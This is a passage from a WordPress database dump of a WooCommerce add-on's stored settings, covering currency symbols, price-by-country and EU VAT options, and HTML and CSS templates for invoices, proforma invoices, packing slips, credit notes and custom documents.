_ILS','&#8362;','yes'),(1102,'wcj_currency_YER','YER','yes'),(1103,'wcj_currency_JMD','JMD','yes'),(1104,'wcj_currency_JPY','&yen;','yes'),(1105,'wcj_currency_JOD','JOD','yes'),(1106,'wcj_currency_KZT','KZT','yes'),(1107,'wcj_currency_KES','KES','yes'),(1108,'wcj_currency_KGS','KGS','yes'),(1109,'wcj_currency_KWD','KWD','yes'),(1110,'wcj_currency_LAK','LAK','yes'),(1111,'wcj_currency_LVL','LVL','yes'),(1112,'wcj_currency_LBP','LBP','yes'),(1113,'wcj_currency_LSL','LSL','yes'),(1114,'wcj_currency_LRD','LRD','yes'),(1115,'wcj_currency_LYD','LYD','yes'),(1116,'wcj_currency_LTL','LTL','yes'),(1117,'wcj_currency_MOP','MOP','yes'),(1118,'wcj_currency_MKD','MKD','yes'),(1119,'wcj_currency_MGA','MGA','yes'),(1120,'wcj_currency_MYR','&#82;&#77;','yes'),(1121,'wcj_currency_MWK','MWK','yes'),(1122,'wcj_currency_MVR','MVR','yes'),(1123,'wcj_currency_MRO','MRO','yes'),(1124,'wcj_currency_MUR','MUR','yes'),(1125,'wcj_currency_MXN','&#36;','yes'),(1126,'wcj_currency_MMK','MMK','yes'),(1127,'wcj_currency_MDL','MDL','yes'),(1128,'wcj_currency_MNT','MNT','yes'),(1129,'wcj_currency_MAD','MAD','yes'),(1130,'wcj_currency_MZM','MZM','yes'),(1131,'wcj_currency_NAD','NAD','yes'),(1132,'wcj_currency_NPR','NPR','yes'),(1133,'wcj_currency_ANG','ANG','yes'),(1134,'wcj_currency_TWD','&#78;&#84;&#36;','yes'),(1135,'wcj_currency_NZD','&#36;','yes'),(1136,'wcj_currency_NIO','NIO','yes'),(1137,'wcj_currency_NGN','NGN','yes'),(1138,'wcj_currency_KPW','KPW','yes'),(1139,'wcj_currency_NOK','&#107;&#114;','yes'),(1140,'wcj_currency_OMR','OMR','yes'),(1141,'wcj_currency_TOP','TOP','yes'),(1142,'wcj_currency_PKR','PKR','yes'),(1143,'wcj_currency_PAB','PAB','yes'),(1144,'wcj_currency_PGK','PGK','yes'),(1145,'wcj_currency_PYG','PYG','yes'),(1146,'wcj_currency_PEN','PEN','yes'),(1147,'wcj_currency_PHP','&#8369;','yes'),(1148,'wcj_currency_PLN','&#122;&#322;','yes'),(1149,'wcj_currency_QAR','QAR','yes'),(1150,'wcj_currency_RON','lei','yes'),(1151,'wcj_currency_RUB','RUB','yes'),(1152,'wcj_currency_RWF','RWF','yes'),(1153,'wcj_currency_SHP','SHP','yes'),(1154,'wcj_currency_WST','WST','yes'),(1155,'wcj_currency_STD','STD','yes'),(1156,'wcj_currency_SAR','SAR','yes'),(1157,'wcj_currency_SCR','SCR','yes'),(1158,'wcj_currency_RSD','RSD','yes'),(1159,'wcj_currency_SLL','SLL','yes'),(1160,'wcj_currency_SGD','&#36;','yes'),(1161,'wcj_currency_SYP','SYP','yes'),(1162,'wcj_currency_SKK','SKK','yes'),(1163,'wcj_currency_SBD','SBD','yes'),(1164,'wcj_currency_SOS','SOS','yes'),(1165,'wcj_currency_ZAR','&#82;','yes'),(1166,'wcj_currency_KRW','&#8361;','yes'),(1167,'wcj_currency_XDR','XDR','yes'),(1168,'wcj_currency_LKR','LKR','yes'),(1169,'wcj_currency_SDG','SDG','yes'),(1170,'wcj_currency_SRD','SRD','yes'),(1171,'wcj_currency_SZL','SZL','yes'),(1172,'wcj_currency_SEK','&#107;&#114;','yes'),(1173,'wcj_currency_CHF','&#67;&#72;&#70;','yes'),(1174,'wcj_currency_TJS','TJS','yes'),(1175,'wcj_currency_TZS','TZS','yes'),(1176,'wcj_currency_THB','&#3647;','yes'),(1177,'wcj_currency_TTD','TTD','yes'),(1178,'wcj_currency_TND','TND','yes'),(1179,'wcj_currency_TRY','&#84;&#76;','yes'),(1180,'wcj_currency_TMM','TMM','yes'),(1181,'wcj_currency_AED','AED','yes'),(1182,'wcj_currency_UGX','UGX','yes'),(1183,'wcj_currency_UAH','UAH','yes'),(1184,'wcj_currency_USD','&#36;','yes'),(1185,'wcj_currency_UYU','UYU','yes'),(1186,'wcj_currency_UZS','UZS','yes'),(1187,'wcj_currency_VUV','VUV','yes'),(1188,'wcj_currency_VEF','VEF','yes'),(1189,'wcj_currency_VND','VND','yes'),(1190,'wcj_currency_XOF','XOF','yes'),(1191,'wcj_currency_ZMK','ZMK','yes'),(1192,'wcj_currency_ZWD','ZWD','yes'),(1193,'wcj_currency_RMB','&yen;','yes'),(1194,'wcj_currency_custom_currency_total_number','1','yes'),(1195,'wcj_currency_custom_currency_name_1','','yes'),(1196,'wcj_currency_custom_currency_code_1','','yes'),(1197,'wcj_currency_custom_currency_symbol_1','','yes'),(1198,'wcj_multicurrency_enabled','no','yes'),(1199,'wcj_currency_external_products_enabled','no','yes'),(1200,'wcj_currency_external_products_symbol','EUR','yes'),(1201,'wcj_price_by_country_enabled','no','yes'),(1202,'wcj_price_by_country_customer_country_detection_method','by_ip','yes'),(1203,'wcj_price_by_country_override_on_checkout_with_billing_country','no','yes'),(1204,'wcj_price_by_country_rounding','none','yes'),(1205,'wcj_price_by_country_local_enabled','yes','yes'),(1206,'wcj_price_by_country_total_groups_number','1','yes'),(1207,'wcj_price_by_country_exchange_rate_countries_group_1','','yes'),(1208,'wcj_price_by_country_exchange_rate_currency_group_1','EUR','yes'),(1209,'wcj_price_by_country_auto_exchange_rates','manual','yes'),(1210,'wcj_price_by_country_exchange_rate_group_1','1','yes'),(1211,'wcj_price_by_country_make_empty_price_group_1','no','yes'),(1212,'wcj_currency_exchange_rates_enabled','no','yes'),(1213,'wcj_general_enabled','no','yes'),(1214,'wcj_general_shortcodes_in_text_widgets_enabled','no','yes'),(1215,'wcj_general_shortcodes_disable_booster_shortcodes','no','yes'),(1216,'wcj_general_custom_css','','yes'),(1217,'wcj_general_custom_admin_css','','yes'),(1218,'wcj_product_revisions_enabled','no','yes'),(1219,'wcj_general_advanced_disable_datepicker_css','no','yes'),(1220,'wcj_general_advanced_datepicker_css','//ajax.googleapis.com/ajax/libs/jqueryui/1.9.0/themes/base/jquery-ui.css','yes'),(1221,'wcj_general_advanced_disable_datepicker_js','no','yes'),(1222,'wcj_general_advanced_disable_timepicker_css','no','yes'),(1223,'wcj_general_advanced_disable_timepicker_js','no','yes'),(1224,'wcj_eu_vat_number_enabled','no','yes'),(1225,'wcj_eu_vat_number_field_label','EU VAT Number','yes'),(1226,'wcj_eu_vat_number_field_placeholder','EU VAT Number','yes'),(1227,'wcj_eu_vat_number_field_description','','yes'),(1228,'wcj_eu_vat_number_field_required','no','yes'),(1229,'wcj_eu_vat_number_field_clear','yes','yes'),(1230,'wcj_eu_vat_number_field_class','form-row-wide','yes'),(1231,'wcj_eu_vat_number_validate','yes','yes'),(1232,'wcj_eu_vat_number_not_valid_message','<strong>EU VAT Number</strong> is not valid.','yes'),(1233,'wcj_eu_vat_number_disable_for_valid','yes','yes'),(1234,'wcj_eu_vat_number_preserve_in_base_country','no','yes'),(1235,'wcj_eu_vat_number_check_ip_location_country','no','yes'),(1236,'wcj_old_slugs_enabled','no','yes'),(1237,'wcj_reports_enabled','no','yes'),(1238,'wcj_admin_tools_enabled','no','yes'),(1239,'wcj_logging_enabled','no','yes'),(1240,'wcj_debuging_enabled','no','yes'),(1241,'wcj_wpml_enabled','no','yes'),(1242,'wcj_invoicing_invoice_sequential_enabled','no','yes'),(1243,'wcj_invoicing_invoice_numbering_counter','1','yes'),(1244,'wcj_invoicing_invoice_numbering_prefix','','yes'),(1245,'wcj_invoicing_invoice_numbering_counter_width','0','yes'),(1246,'wcj_invoicing_invoice_numbering_suffix','','yes'),(1247,'wcj_invoicing_proforma_invoice_sequential_enabled','no','yes'),(1248,'wcj_invoicing_proforma_invoice_numbering_counter','1','yes'),(1249,'wcj_invoicing_proforma_invoice_numbering_prefix','','yes'),(1250,'wcj_invoicing_proforma_invoice_numbering_counter_width','0','yes'),(1251,'wcj_invoicing_proforma_invoice_numbering_suffix','','yes'),(1252,'wcj_invoicing_packing_slip_sequential_enabled','no','yes'),(1253,'wcj_invoicing_packing_slip_numbering_counter','1','yes'),(1254,'wcj_invoicing_packing_slip_numbering_prefix','','yes'),(1255,'wcj_invoicing_packing_slip_numbering_counter_width','0','yes'),(1256,'wcj_invoicing_packing_slip_numbering_suffix','','yes'),(1257,'wcj_invoicing_credit_note_sequential_enabled','no','yes'),(1258,'wcj_invoicing_credit_note_numbering_counter','1','yes'),(1259,'wcj_invoicing_credit_note_numbering_prefix','','yes'),(1260,'wcj_invoicing_credit_note_numbering_counter_width','0','yes'),(1261,'wcj_invoicing_credit_note_numbering_suffix','','yes'),(1262,'wcj_invoicing_custom_doc_sequential_enabled','no','yes'),(1263,'wcj_invoicing_custom_doc_numbering_counter','1','yes'),(1264,'wcj_invoicing_custom_doc_numbering_prefix','','yes'),(1265,'wcj_invoicing_custom_doc_numbering_counter_width','0','yes'),(1266,'wcj_invoicing_custom_doc_numbering_suffix','','yes'),(1267,'wcj_invoicing_invoice_template','<h1>Invoice</h1>\r\n<p>\r\n<table class=\"pdf_invoice_heading_table\">\r\n<tbody>\r\n	<tr><th>Invoice Nr.</th><td>[wcj_invoice_number]</td></tr>\r\n	<tr><th>Invoice Date</th><td>[wcj_invoice_date]</td></tr>\r\n	<tr><th>Order Nr.</th><td>[wcj_order_number]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n<table class=\"pdf_invoice_seller_buyer_table\">\r\n<tbody>\r\n	<tr><th>Seller</th><th>Buyer</th></tr>\r\n	<tr><td>COMPANY NAME<br>COMPANY ADDRESS 1<br>COMPANY ADDRESS 2<br></td><td>[wcj_order_billing_address]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n[wcj_order_items_table table_class=\"pdf_invoice_items_table\"\r\n	columns=\"item_number|item_name|item_quantity|line_total_tax_excl\"\r\n	columns_titles=\"|Product|Qty|Total\"\r\n	columns_styles=\"width:5%;|width:75%;|width:5%;|width:15%;text-align:right;\"]\r\n<table class=\"pdf_invoice_totals_table\">\r\n<tbody>\r\n	<tr><th>Total (excl. TAX)</th><td>[wcj_order_total_excl_tax]</td></tr>\r\n	<tr><th>Taxes</th><td>[wcj_order_total_tax hide_if_zero=\"no\"]</td></tr>\r\n	<tr><th>Order Total</th><td>[wcj_order_total]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>Payment method: [wcj_order_payment_method]</p>','yes'),(1268,'wcj_invoicing_proforma_invoice_template','<h1>Proforma Invoice</h1>\r\n<p>\r\n<table class=\"pdf_invoice_heading_table\">\r\n<tbody>\r\n	<tr><th>Proforma Invoice Nr.</th><td>[wcj_proforma_invoice_number]</td></tr>\r\n	<tr><th>Proforma Invoice Date</th><td>[wcj_proforma_invoice_date]</td></tr>\r\n	<tr><th>Order Nr.</th><td>[wcj_order_number]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n<table class=\"pdf_invoice_seller_buyer_table\">\r\n<tbody>\r\n	<tr><th>Seller</th><th>Buyer</th></tr>\r\n	<tr><td>COMPANY NAME<br>COMPANY ADDRESS 1<br>COMPANY ADDRESS 2<br></td><td>[wcj_order_billing_address]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n[wcj_order_items_table table_class=\"pdf_invoice_items_table\"\r\n	columns=\"item_number|item_name|item_quantity|line_total_tax_excl\"\r\n	columns_titles=\"|Product|Qty|Total\"\r\n	columns_styles=\"width:5%;|width:75%;|width:5%;|width:15%;text-align:right;\"\r\n	discount_as_item=\"Discount\"]\r\n<table class=\"pdf_invoice_totals_table\">\r\n<tbody>\r\n	<tr><th>Total (excl. TAX)</th><td>[wcj_order_total_excl_tax]</td></tr>\r\n	<tr><th>Taxes</th><td>[wcj_order_total_tax hide_if_zero=\"no\"]</td></tr>\r\n	<tr><th>Order Total</th><td>[wcj_order_total]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>','yes'),(1269,'wcj_invoicing_packing_slip_template','<h1>Packing Slip</h1>\r\n<p>\r\n<table class=\"pdf_invoice_heading_table\">\r\n<tbody>\r\n	<tr><th>Shipping method</th><td>[wcj_order_shipping_method]</td></tr>\r\n	<tr><th>Proforma Invoice Nr.</th><td>[wcj_proforma_invoice_number]</td></tr>\r\n	<tr><th>Invoice Nr.</th><td>[wcj_invoice_number]</td></tr>\r\n	<tr><th>Order Nr.</th><td>[wcj_order_number]</td></tr>\r\n	<tr><th>Order Date</th><td>[wcj_order_date]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<h2>Shipping address</h2>\r\n<p>\r\n<table>\r\n<tbody>\r\n	<tr><td>[wcj_order_shipping_address]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<h2>Items</h2>\r\n<p>\r\n[wcj_order_items_table table_class=\"pdf_invoice_items_table\"\r\n	columns=\"item_number|item_name|item_quantity\"\r\n	columns_titles=\"|Item|Qty\"\r\n	columns_styles=\"width:5%;|width:80%;|width:15%;text-align:right;\"]\r\n</p>','yes'),(1270,'wcj_invoicing_credit_note_template','<h1>Credit Note</h1>\r\n<p>\r\n<table class=\"pdf_invoice_heading_table\">\r\n<tbody>\r\n	<tr><th>Credit Note Nr.</th><td>[wcj_credit_note_number]</td></tr>\r\n	<tr><th>Credit Note Date</th><td>[wcj_credit_note_date]</td></tr>\r\n	<tr><th>Invoice Nr.</th><td>[wcj_invoice_number]</td></tr>\r\n	<tr><th>Order Nr.</th><td>[wcj_order_number]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n<table class=\"pdf_invoice_seller_buyer_table\">\r\n<tbody>\r\n	<tr><th>Seller</th><th>Buyer</th></tr>\r\n	<tr><td>COMPANY NAME<br>COMPANY ADDRESS 1<br>COMPANY ADDRESS 2<br></td><td>[wcj_order_billing_address]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n[wcj_order_items_table table_class=\"pdf_invoice_items_table\" price_prefix=\"-\"\r\n	columns=\"item_number|item_name|item_quantity|line_total_tax_excl\"\r\n	columns_titles=\"|Product|Qty|Total\"\r\n	columns_styles=\"width:5%;|width:75%;|width:5%;|width:15%;text-align:right;\"]\r\n<table class=\"pdf_invoice_totals_table\">\r\n<tbody>\r\n	<tr><th>Total (excl. TAX)</th><td>-[wcj_order_total_excl_tax]</td></tr>\r\n	<tr><th>Taxes</th><td>-[wcj_order_total_tax hide_if_zero=\"no\"]</td></tr>\r\n	<tr><th>Order Total</th><td>-[wcj_order_total]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>Payment method: [wcj_order_payment_method]</p>','yes'),(1271,'wcj_invoicing_custom_doc_template','<h1>Custom Document</h1>\r\n<p>\r\n<table class=\"pdf_invoice_heading_table\">\r\n<tbody>\r\n	<tr><th>Custom Document Nr.</th><td>[wcj_custom_doc_number]</td></tr>\r\n	<tr><th>Custom Document Date</th><td>[wcj_custom_doc_date]</td></tr>\r\n	<tr><th>Invoice Nr.</th><td>[wcj_invoice_number]</td></tr>\r\n	<tr><th>Invoice Date</th><td>[wcj_invoice_date]</td></tr>\r\n	<tr><th>Order Nr.</th><td>[wcj_order_number]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n<table class=\"pdf_invoice_seller_buyer_table\">\r\n<tbody>\r\n	<tr><th>Seller</th><th>Buyer</th></tr>\r\n	<tr><td>COMPANY NAME<br>COMPANY ADDRESS 1<br>COMPANY ADDRESS 2<br></td><td>[wcj_order_billing_address]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>\r\n[wcj_order_items_table table_class=\"pdf_invoice_items_table\"\r\n	columns=\"item_number|item_name|item_quantity|line_total_tax_excl\"\r\n	columns_titles=\"|Product|Qty|Total\"\r\n	columns_styles=\"width:5%;|width:75%;|width:5%;|width:15%;text-align:right;\"]\r\n<table class=\"pdf_invoice_totals_table\">\r\n<tbody>\r\n	<tr><th>Total (excl. TAX)</th><td>[wcj_order_total_excl_tax]</td></tr>\r\n	<tr><th>Taxes</th><td>[wcj_order_total_tax hide_if_zero=\"no\"]</td></tr>\r\n	<tr><th>Order Total</th><td>[wcj_order_total]</td></tr>\r\n</tbody>\r\n</table>\r\n</p>\r\n<p>Payment method: [wcj_order_payment_method]</p>','yes'),(1272,'wcj_invoicing_invoice_css','.pdf_invoice_heading_table {\r\n	width: 50%;\r\n}\r\n\r\n.pdf_invoice_seller_buyer_table th {\r\n	font-weight: bold;\r\n}\r\n/* pdf_invoice_items_table */\r\n.pdf_invoice_items_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_items_table th {\r\n	font-weight: bold;\r\n	border: 1px solid #F0F0F0;\r\n}\r\n.pdf_invoice_items_table td {\r\n	border: 1px solid #F0F0F0;\r\n}\r\n/* pdf_invoice_totals_table */\r\n.pdf_invoice_totals_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_totals_table th {\r\n	width: 85%;\r\n	text-align: right;\r\n}\r\n.pdf_invoice_totals_table td {\r\n	width: 15%;\r\n	text-align: right;\r\n	border: 1px solid #F0F0F0;\r\n}','yes'),(1273,'wcj_invoicing_invoice_general_font_family','dejavusans','yes'),(1274,'wcj_invoicing_invoice_general_font_size','8','yes'),(1275,'wcj_invoicing_invoice_general_font_shadowed','no','yes'),(1276,'wcj_invoicing_proforma_invoice_css','.pdf_invoice_heading_table {\r\n	width: 50%;\r\n}\r\n\r\n.pdf_invoice_seller_buyer_table th {\r\n	font-weight: bold;\r\n}\r\n/* pdf_invoice_items_table */\r\n.pdf_invoice_items_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_items_table th {\r\n	font-weight: bold;\r\n	border: 1px solid #F0F0F0;\r\n}\r\n.pdf_invoice_items_table td {\r\n	border: 1px solid #F0F0F0;\r\n}\r\n/* pdf_invoice_totals_table */\r\n.pdf_invoice_totals_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_totals_table th {\r\n	width: 85%;\r\n	text-align: right;\r\n}\r\n.pdf_invoice_totals_table td {\r\n	width: 15%;\r\n	text-align: right;\r\n	border: 1px solid #F0F0F0;\r\n}','yes'),(1277,'wcj_invoicing_proforma_invoice_general_font_family','dejavusans','yes'),(1278,'wcj_invoicing_proforma_invoice_general_font_size','8','yes'),(1279,'wcj_invoicing_proforma_invoice_general_font_shadowed','no','yes'),(1280,'wcj_invoicing_packing_slip_css','.pdf_invoice_heading_table {\r\n	width: 50%;\r\n}\r\n.pdf_invoice_items_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_items_table th {\r\n	font-weight: bold;\r\n	border: 1px solid #F0F0F0;\r\n}\r\n.pdf_invoice_items_table td {\r\n	border: 1px solid #F0F0F0;\r\n}','yes'),(1281,'wcj_invoicing_packing_slip_general_font_family','dejavusans','yes'),(1282,'wcj_invoicing_packing_slip_general_font_size','8','yes'),(1283,'wcj_invoicing_packing_slip_general_font_shadowed','no','yes'),(1284,'wcj_invoicing_credit_note_css','.pdf_invoice_heading_table {\r\n	width: 50%;\r\n}\r\n\r\n.pdf_invoice_seller_buyer_table th {\r\n	font-weight: bold;\r\n}\r\n/* pdf_invoice_items_table */\r\n.pdf_invoice_items_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_items_table th {\r\n	font-weight: bold;\r\n	border: 1px solid #F0F0F0;\r\n}\r\n.pdf_invoice_items_table td {\r\n	border: 1px solid #F0F0F0;\r\n}\r\n/* pdf_invoice_totals_table */\r\n.pdf_invoice_totals_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_totals_table th {\r\n	width: 85%;\r\n	text-align: right;\r\n}\r\n.pdf_invoice_totals_table td {\r\n	width: 15%;\r\n	text-align: right;\r\n	border: 1px solid #F0F0F0;\r\n}','yes'),(1285,'wcj_invoicing_credit_note_general_font_family','dejavusans','yes'),(1286,'wcj_invoicing_credit_note_general_font_size','8','yes'),(1287,'wcj_invoicing_credit_note_general_font_shadowed','no','yes'),(1288,'wcj_invoicing_custom_doc_css','.pdf_invoice_heading_table {\r\n	width: 50%;\r\n}\r\n\r\n.pdf_invoice_seller_buyer_table th {\r\n	font-weight: bold;\r\n}\r\n/* pdf_invoice_items_table */\r\n.pdf_invoice_items_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_items_table th {\r\n	font-weight: bold;\r\n	border: 1px solid #F0F0F0;\r\n}\r\n.pdf_invoice_items_table td {\r\n	border: 1px solid #F0F0F0;\r\n}\r\n/* pdf_invoice_totals_table */\r\n.pdf_invoice_totals_table {\r\n	padding: 5px;\r\n}\r\n.pdf_invoice_totals_table th {\r\n	width: 85%;\r\n	text-align: right;\r\n}\r\n.pdf_invoice_totals_table td {\r\n	width: 15%;\r\n	text-align: right;\r\n	border: 1px solid #F0F0F0;\r\n}','yes'),(1289,'wcj_invoicing_custom_doc_general_font_family','dejavusans','yes'),(1290,'wcj_invoicing_custom_doc_general_font_size','8','yes'),(1291,'wcj_invoicing_custom_doc_general_font_shadowed','no','yes'),(1292,'wcj_invoicing_invoice_header_enabled','yes','yes'),(1293,'wcj_invoicing_invoice_header_image','','yes'),(1294,'wcj_invoicing_invoice_header_image_width_mm','50','yes'),(1295,'wcj_invoicing_invoice_header_title_text','Invoice','yes'),(1296,'wcj_invoicing_invoice_header_text','Company Name','yes'),(1297,'wcj_invoicing_invoice_header_text_color','#cccccc','yes'),(1298,'wcj_invoicing_invoice_header_line_color','#cccccc','yes'),(1299,'wcj_invoicing_invoice_margin_header','10','yes'),(1300,'wcj_invoicing_proforma_invoice_header_enabled','yes','yes'),(1301,'wcj_invoicing_proforma_invoice_header_image','','yes'),(1302,'wcj_invoicing_proforma_invoice_header_image_width_mm','50','yes'),(1303,'wcj_invoicing_proforma_invoice_header_title_text','Proforma Invoice','yes'),(1304,'wcj_invoicing_proforma_invoice_header_text','Company Name','yes'),(1305,'wcj_invoicing_proforma_invoice_header_text_color','#cccccc','yes'),(1306,'wcj_invoicing_proforma_invoice_header_line_color','#cccccc','yes'),(1307,'wcj_invoicing_proforma_invoice_margin_header','10','yes'),(1308,'wcj_invoicing_packing_slip_header_enabled','yes','yes'),(1309,'wcj_invoicing_packing_slip_header_image','','yes'),(1310,'wcj_invoicing_packing_slip_header_image_width_mm','50','yes'),(1311,'wcj_invoicing_packing_slip_header_title_text','Packing Slip','yes'),(1312,'wcj_invoicing_packing_slip_header_text','Company Name','yes'),(1313,'wcj_invoicing_packing_slip_header_text_color','#cccccc','yes'),(1314,'wcj_invoicing_packing_slip_header_line_color','#cccccc','yes'),(1315,'wcj_invoicing_packing_slip_margin_header','10','yes'),(1316,'wcj_invoicing_credit_note_header_enabled','yes','yes'),(1317,'wcj_invoicing_credit_note_header_image','','yes'),(1318,'wcj_invoicing_credit_note_header_image_width_mm','50','yes'),(1319,'wcj_invoicing_credit_note_header_title_text','Credit Note','yes'),(1320,'wcj_invoicing_credit_note_header_text','Company Name','yes'),(1321,'wcj_invoicing_credit_note_header_text_color','#cccccc','yes'),(1322,'wcj_invoicing_credit_note_header_line_color','#cccccc','yes'),(1323,'wcj_invoicing_credit_note_margin_header','10','yes'),(1324,'wcj_invoicing_custom_doc_header_enabled','yes','yes'),(1325,'wcj_invoicing_custom_doc_header_image','','yes'),(1326,'wcj_invoicing_custom_doc_header_image_width_mm','50','yes'),(1327,'wcj_invoicing_custom_doc_header_title_text','Custom Document','yes'),(1328,'wcj_invoicing_custom_doc_header_text','Company Name','yes'),(1329,'wcj_invoicing_custom_doc_header_text_color','#cccccc','yes'),(1330,'wcj_invoicing_custom_doc_header_line_color','#cccccc','yes'),(1331,'wcj_invoicing_custom_doc_margin_header','10','yes'),(1332,'wcj_invoicing_invoice_footer_enabled','yes','yes'),(1333,'wcj_invoicing_invoice_footer_text','Page %page_number% / %total_pages%','yes'),(1334,'wcj_invoicing_invoice_footer_text_color','#cccccc','yes'),(1335,'wcj_invoicing_invoice_footer_line_color','#cccccc','yes'),(1336,'wcj_invoicing_invoice_margin_footer','10','yes'),(1337,'wcj_invoicing_proforma_invoice_footer_enabled','yes','yes'),(1338,'wcj_invoicing_proforma_invoice_footer_text','Page %page_number% / %total_pages%','yes'),(1339,'wcj_invoicing_proforma_invoice_footer_text_color','#cccccc','yes'),(1340,'wcj_invoicing_proforma_invoice_footer_line_color','#cccccc','yes'),(1341,'wcj_invoicing_proforma_invoice_margin_footer','10','yes'),(1342,'wcj_invoicing_packing_slip_footer_enabled','yes','yes'),(1343,'wcj_invoicing_packing_slip_footer_text','Page %page_number% / %total_pages%','yes'),(1344,'wcj_invoicing_packing_slip_footer_text_color','#cccccc','yes'),(1345,'wcj_invoicing_packing_slip_footer_line_color','#cccccc','yes'),(1346,'wcj_invoicing_packing_slip_margin_footer','10','yes'),(1347,'wcj_invoicing_credit_note_footer_enabled','yes','yes'),(1348,'wcj_invoicing_credit_note_footer_text','Page %page_number% / %total_pages%','yes'),(1349,'wcj_invoicing_credit_note_footer_text_color','#cccccc','yes'),(1350,'wcj_invoicing_credit_note_footer_line_color','#cccccc','yes'),(1351,'wcj_invoicing_credit_note_margin_footer','10','yes'),(1352,'wcj_invoicing_custom_doc_footer_enabled','yes','yes'),(1353,'wcj_invoicing_custom_doc_footer_text','Page %page_number% / %total_pages%','yes'),(1354,'wcj_invoicing_custom_doc_footer_text_color','#cccccc','yes'),(1355,'wcj_invoicing_custom_doc_footer_line_color','#cccccc','yes'),(1356,'wcj_invoicing_custom_doc_margin_footer','10','yes'),(1357,'wcj_invoicing_invoice_page_orientation','P','yes'),(1358,'wcj_invoicing_invoice_page_format','A4','yes'),(1359,'wcj_invoicing_invoice_margin_left','15','yes'),(1360,'wcj_invoicing_invoice_margin_right','15','yes'),(1361,'wcj_invoicing_invoice_margin_top','27','yes'),(1362,'wcj_invoicing_invoice_margin_bottom','0','yes'),(1363,'wcj_invoicing_proforma_invoice_page_orientation','P','yes'),(1364,'wcj_invoicing_proforma_invoice_page_format','A4','yes'),(1365,'wcj_invoicing_proforma_invoice_margin_left','15','yes'),(1366,'wcj_invoicing_proforma_invoice_margin_right','15','yes'),(1367,'wcj_invoicing_proforma_invoice_margin_top','27','yes'),(1368,'wcj_invoicing_proforma_invoice_margin_bottom','0','yes'),(1369,'wcj_invoicing_packing_slip_page_orientation','P','yes'),(1370,'wcj_invoicing_packing_slip_page_format','A4','yes'),(1371,'wcj_invoicing_packing_slip_margin_left','15','yes'),(1372,'wcj_invoicing_packing_slip_margin_right','15','yes'),(1373,'wcj_invoicing_packing_slip_margin_top','27','yes'),(1374,'wcj_invoicing_packing_slip_margin_bottom','0','yes'),(1375,'wcj_invoicing_credit_note_page_orientation','P','yes'),(1376,'wcj_invoicing_credit_note_page_format','A4','yes'),(1377,'wcj_invoicing_credit_note_margin_left','15','yes'),(1378,'wcj_invoicing_credit_note_margin_right','15','yes'),(1379,'wcj_invoicing_credit_note_margin_top','27','yes'),(1380,'wcj_invoicing_credit_note_margin_bottom','0','yes'),(1381,'wcj_invoicing_custom_doc_page_orientation','P','yes'),(1382,'wcj_invoicing_custom_doc_page_format','A4','yes'),(1383,'wcj_invoicing_custom_doc_margin_left','15','yes'),(1384,'wcj_invoicing_custom_doc_margin_right','15','yes'),(1385,'wcj_invoicing_custom_doc_margin_top','27','yes'),(1386,'wcj_invoicing_custom_doc_margin_bottom','0','yes'),(1387,'wcj_invoicing_invoice_attach_to_emails','','yes'),(1388,'wcj_invoicing_proforma_invoice_attach_to_emails','','yes'),(1389,'wcj_invoicing_packing_slip_attach_to_emails','','yes'),(1390,'wcj_invoicing_credit_note_attach_to_emails','','yes'),(1391,'wcj_invoicing_custom_doc_attach_to_emails','','yes'),(1392,'wcj_invoicing_invoice_admin_orders_page_column','yes','yes'),(1393,'wcj_invoicing_invoice_admin_page_column_text','Invoice','yes'),(1394,'wcj_invoicing_invoice_admin_column_create_btn','Create','yes'),(1395,'wcj_invoicing_invoice_admin_column_delete_btn','Delete','yes'),(1396,'wcj_invoicing_invoice_enabled_for_customers','no','yes'),(1397,'wcj_invoicing_invoice_link_text','Invoice','yes'),(1398,'wcj_invoicing_invoice_save_as_enabled','yes','yes'),(1399,'wcj_invoicing_invoice_file_name','[wcj_invoice_number]','yes'),(1400,'wcj_invoicing_proforma_invoice_admin_orders_page_column','yes','yes'),(1401,'wcj_invoicing_proforma_invoice_admin_page_column_text','Proforma Invoice','yes'),(1402,'wcj_invoicing_proforma_invoice_admin_column_create_btn','Create','yes'),(1403,'wcj_invoicing_proforma_invoice_admin_column_delete_btn','Delete','yes'),(1404,'wcj_invoicing_proforma_invoice_enabled_for_customers','no','yes'),(1405,'wcj_invoicing_proforma_invoice_link_text','Proforma Invoice','yes'),(1406,'wcj_invoicing_proforma_invoice_save_as_enabled','yes','yes'),(1407,'wcj_invoicing_proforma_invoice_file_name','[wcj_proforma_invoice_number]','yes'),(1408,'wcj_invoicing_packing_slip_admin_orders_page_column','yes','yes'),(1409,'wcj_invoicing_packing_slip_admin_page_column_text','Packing Slip','yes'),(1410,'wcj_invoicing_packing_slip_admin_column_create_btn','Create','yes'),(1411,'wcj_invoicing_packing_slip_admin_column_delete_btn','Delete','yes'),(1412,'wcj_invoicing_packing_slip_enabled_for_customers','no','yes'),(1413,'wcj_invoicing_packing_slip_link_text','Packing Slip','yes'),(1414,'wcj_invoicing_packing_slip_save_as_enabled','yes','yes'),(1415,'wcj_invoicing_packing_slip_file_name','[wcj_packing_slip_number]','yes'),(440803,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1416,'wcj_invoicing_credit_note_admin_orders_page_column','yes','yes'),(1417,'wcj_invoicing_credit_note_admin_page_column_text','Credit 